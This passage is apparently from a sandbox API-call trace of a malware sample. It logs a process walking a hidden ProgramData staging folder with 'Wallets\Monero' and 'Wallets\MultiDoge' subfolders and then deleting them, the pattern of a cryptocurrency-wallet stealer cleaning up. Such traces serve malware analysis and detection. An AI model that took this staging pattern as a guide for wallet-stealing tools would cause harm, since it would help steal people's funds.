returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\" [0116.530] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\.." [0116.530] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Monero" | out: lpString1="\\Wallets\\Monero") returned="\\Wallets\\Monero" [0116.530] lstrcatW (in: lpString1="\\Wallets\\Monero", lpString2="\\" | out: lpString1="\\Wallets\\Monero\\") returned="\\Wallets\\Monero\\" [0116.530] lstrcatW (in: lpString1="\\Wallets\\Monero\\", lpString2=".." | out: lpString1="\\Wallets\\Monero\\..") returned="\\Wallets\\Monero\\.." [0116.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.530] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.530] FindClose (in: hFindFile=0x7434e0 | out: hFindFile=0x7434e0) returned 1 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9188 [0116.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2c48 [0116.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", cchWideChar=62, lpMultiByteStr=0x29a2c48, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", lpUsedDefaultChar=0x0) returned 62 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0116.531] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0116.531] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9188 | out: hHeap=0x29a0000) returned 1 [0116.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6898 [0116.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6898, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.531] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6898 | out: hHeap=0x29a0000) returned 1 [0116.531] PathMatchSpecW (pszFile="Monero", pszSpec="*.*") returned 1 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9298 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0116.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a29c0 [0116.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", cchWideChar=62, lpMultiByteStr=0x29a29c0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", lpUsedDefaultChar=0x0) returned 62 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0116.531] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0116.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Monero", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab88 [0116.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Monero", cchWideChar=16, lpMultiByteStr=0x29aab88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\Monero", lpUsedDefaultChar=0x0) returned 16 [0116.531] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab88 | out: hHeap=0x29a0000) returned 1 [0116.532] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\monero"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.532] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0116.532] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970650 | out: hHeap=0x29a0000) returned 1 [0116.532] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9298 | out: hHeap=0x29a0000) returned 1 [0116.532] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\monero")) returned 0 [0116.532] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0116.532] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36330084, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x36330084, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36330084, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MultiDoge", cAlternateFileName="MULTID~1")) returned 1 [0116.532] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.532] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.532] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="MultiDoge" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" [0116.532] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.532] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.532] lstrcatW (in: lpString1="\\Wallets\\", lpString2="MultiDoge" | out: lpString1="\\Wallets\\MultiDoge") returned="\\Wallets\\MultiDoge" [0116.532] lstrcmpW (lpString1="MultiDoge", lpString2=".") returned 1 [0116.532] lstrcmpW (lpString1="MultiDoge", lpString2="..") returned 1 [0116.532] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" [0116.532] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\*.*" [0116.532] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36330084, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x36330084, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36330084, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7435a0 [0116.533] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" [0116.533] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\" [0116.533] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\." [0116.533] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\MultiDoge" | out: lpString1="\\Wallets\\MultiDoge") returned="\\Wallets\\MultiDoge" [0116.533] lstrcatW (in: lpString1="\\Wallets\\MultiDoge", lpString2="\\" | out: lpString1="\\Wallets\\MultiDoge\\") returned="\\Wallets\\MultiDoge\\" [0116.533] lstrcatW (in: lpString1="\\Wallets\\MultiDoge\\", lpString2="." | out: lpString1="\\Wallets\\MultiDoge\\.") returned="\\Wallets\\MultiDoge\\." [0116.533] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.533] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36330084, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x36330084, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36330084, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.533] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" [0116.533] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\" [0116.533] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge\\.." [0116.533] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\MultiDoge" | out: lpString1="\\Wallets\\MultiDoge") returned="\\Wallets\\MultiDoge" [0116.533] lstrcatW (in: lpString1="\\Wallets\\MultiDoge", lpString2="\\" | out: lpString1="\\Wallets\\MultiDoge\\") returned="\\Wallets\\MultiDoge\\" [0116.533] lstrcatW (in: lpString1="\\Wallets\\MultiDoge\\", lpString2=".." | out: lpString1="\\Wallets\\MultiDoge\\..") returned="\\Wallets\\MultiDoge\\.." [0116.533] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.533] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.533] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36330084, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x36330084, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36330084, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.533] FindClose (in: hFindFile=0x7435a0 | out: hFindFile=0x7435a0) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0116.533] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x38eb478 [0116.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", cchWideChar=65, lpMultiByteStr=0x38eb478, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", lpUsedDefaultChar=0x0) returned 65 [0116.533] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eabb0 [0116.533] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb478 | out: hHeap=0x29a0000) returned 1 [0116.533] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.534] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6858 [0116.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6858, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.534] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6858 | out: hHeap=0x29a0000) returned 1 [0116.534] PathMatchSpecW (pszFile="MultiDoge", pszSpec="*.*") returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.534] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700e0 [0116.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0116.534] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x38eb6f8 [0116.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", cchWideChar=65, lpMultiByteStr=0x38eb6f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge", lpUsedDefaultChar=0x0) returned 65 [0116.534] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaaa8 [0116.534] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb6f8 | out: hHeap=0x29a0000) returned 1 [0116.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\MultiDoge", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0116.534] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x13) returned 0x3970c00 [0116.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\MultiDoge", cchWideChar=19, lpMultiByteStr=0x3970c00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\MultiDoge", lpUsedDefaultChar=0x0) returned 19 [0116.534] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0116.534] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0116.534] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\multidoge"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.534] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0116.534] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaaa8 | out: hHeap=0x29a0000) returned 1 [0116.534] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700e0 | out: hHeap=0x29a0000) returned 1 [0116.534] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.534] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\MultiDoge" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\multidoge")) returned 0 [0116.534] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eabb0 | out: hHeap=0x29a0000) returned 1 [0116.534] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36330084, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x36330084, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36330084, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MultiDoge", cAlternateFileName="MULTID~1")) returned 0 [0116.534] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x37) returned 0x38ea458 [0116.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", cchWideChar=55, lpMultiByteStr=0x38ea458, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpUsedDefaultChar=0x0) returned 55 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0116.535] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea458 | out: hHeap=0x29a0000) returned 1 [0116.535] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6838 [0116.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a6838, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.535] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6838 | out: hHeap=0x29a0000) returned 1 [0116.535] PathMatchSpecW (pszFile="Wallets", pszSpec="*.*") returned 1 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0116.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x37) returned 0x38ea6d8 [0116.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", cchWideChar=55, lpMultiByteStr=0x38ea6d8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpUsedDefaultChar=0x0) returned 55 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0116.535] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea6d8 | out: hHeap=0x29a0000) returned 1 [0116.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.535] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9) returned 0x29aab88 [0116.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets", cchWideChar=9, lpMultiByteStr=0x29aab88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets", lpUsedDefaultChar=0x0) returned 9 [0116.535] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab88 | out: hHeap=0x29a0000) returned 1 [0116.535] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.535] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0116.536] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0116.536] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.536] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets")) returned 0 [0116.536] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d20 | out: hHeap=0x29a0000) returned 1 [0116.536] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x347852ca, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x347852ca, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x347852ca, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wallets", cAlternateFileName="")) returned 0 [0116.536] FindClose (in: hFindFile=0x743920 | out: hFindFile=0x743920) returned 1 [0116.541] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a77c8 | out: hHeap=0x29a0000) returned 1 